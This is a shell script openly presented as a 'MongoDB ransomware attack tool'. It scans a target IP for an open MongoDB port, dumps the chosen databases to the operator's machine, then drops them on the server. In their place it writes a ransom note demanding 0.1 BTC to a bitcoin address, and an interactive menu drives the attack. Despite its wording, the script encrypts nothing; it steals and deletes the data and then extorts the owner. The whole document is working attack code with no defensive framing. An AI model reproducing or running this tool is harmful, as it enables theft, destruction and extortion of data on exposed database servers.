#!/bin/sh
# declare mongodb port
PORT=27017
ADDR=$1
BITCOIN_ADDR="1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX" # sample bitcoin address
# create banner function
banner() {
# banner
echo "Mongodb Ransomware Attack Tool v1.0"
echo "Author: @peculiardev"
echo "Date: 2023-06-14"
echo "Description: This tool is used to attack mongodb database and encrypt the data"
echo "Usage: ./script.sh <ip>"
echo "Example: ./script.sh 192.168.43.1"
}
# check if ip is provided
if [ -z "$1" ]; then
echo "Please provide the ip address of the mongodb server"
exit 1
fi
# checking if mongodb port is open using nmap
echo "check mongodb port..."
nmap -p $PORT $1 | grep open >/dev/null
isOpen=$?
if [ $isOpen -eq 0 ]; then
echo "mongodb port is open"
else
echo "mongodb port is closed"
exit 1
fi
listDatabases() {
echo "list all databases..."
echo "=============================="
mongo --host $ADDR --port $PORT --eval "printjson(db.adminCommand('listDatabases'))" | grep name | cut -d "\"" -f 4
echo "=============================="
}
encrypt() {
echo -n "Enter database name: " && read dbName
if [ -z "$dbName" ]; then
echo "Please provide the database name"
exit 1
fi
if [ $dbName = "admin" ]; then
echo "You cannot encrypt admin database"
exit 1
fi
# if * is provided, encrypt all databases
if [ $dbName = "*" ]; then
echo "encrypting all databases..."
databases=$(mongo --host $ADDR --port $PORT --eval "printjson(db.adminCommand('listDatabases'))" | grep name | cut -d "\"" -f 4)
for db in $databases; do
if [ $db = "admin" ]; then
echo "You cannot encrypt admin database"
exit 1
fi
# backup database
mongodump --host $ADDR --port $PORT --db $db /o $ADDR
# remove database from mongodb
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.dropDatabase();"
# set message that database is encrypted
echo -n "Enter message: " && read message
# set default message
if [ -z "$message" ]; then
message="Your database is encrypted, please pay 0.1 BTC to $BITCOIN_ADDR, if you want to decrypt your database"
fi
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.message.insert({message: '$message', encrypted: true});"
done
exit 1
else
echo "encrypting database..."
# backup database
mongodump --host $ADDR --port $PORT --db $dbName /o $ADDR
# delete database
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.dropDatabase();"
# set message that database is encrypted
echo -n "Enter message: " && read message
if [ -z "$message" ]; then
# set default message
message="Your database is encrypted, please pay 0.1 BTC to $BITCOIN_ADDR, if you want to decrypt your database"
fi
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.message.insert({message: '$message', encrypted: true});"
fi
}
decrypt() {
echo -n "Enter database name: " && read dbName
echo "decrypting database..."
if [ -z "$dbName" ]; then
echo "Please provide the database name"
exit 1
fi
if [ $dbName = "admin" ]; then
echo "You cannot decrypt admin database"
exit 1
fi
if [ "$dbName" = "*" ]; then
echo "decrypting all databases..."
databases=$(ls /$ADDR/)
for db in $databases; do
if [ $db = "admin" ]; then
echo "You cannot decrypt admin database"
exit 1
fi
# restore database
mongorestore --host $ADDR --port $PORT --db $db /o /$ADDR
# delete message
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.message.remove({});"
done
exit 1
else
# restore database
mongorestore --host $ADDR --port $PORT --db $dbName /o /$ADDR
# delete message
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.message.remove({});"
fi
}
isLoop=1
while [ $isLoop -eq 1 ]; do
echo "1. List all databases"
echo "2. Encrypt database"
echo "3. Decrypt database"
echo "4. Show banner"
echo "5. Exit"
echo -n "Enter your choice: " && read choice
if [ $choice -eq 1 ]; then
listDatabases
elif [ $choice -eq 2 ]; then
encrypt
elif [ $choice -eq 3 ]; then
decrypt
elif [ $choice -eq 4 ]; then
banner
elif [ $choice -eq 5 ]; then
isLoop=0
else
echo "Invalid choice"
fi
done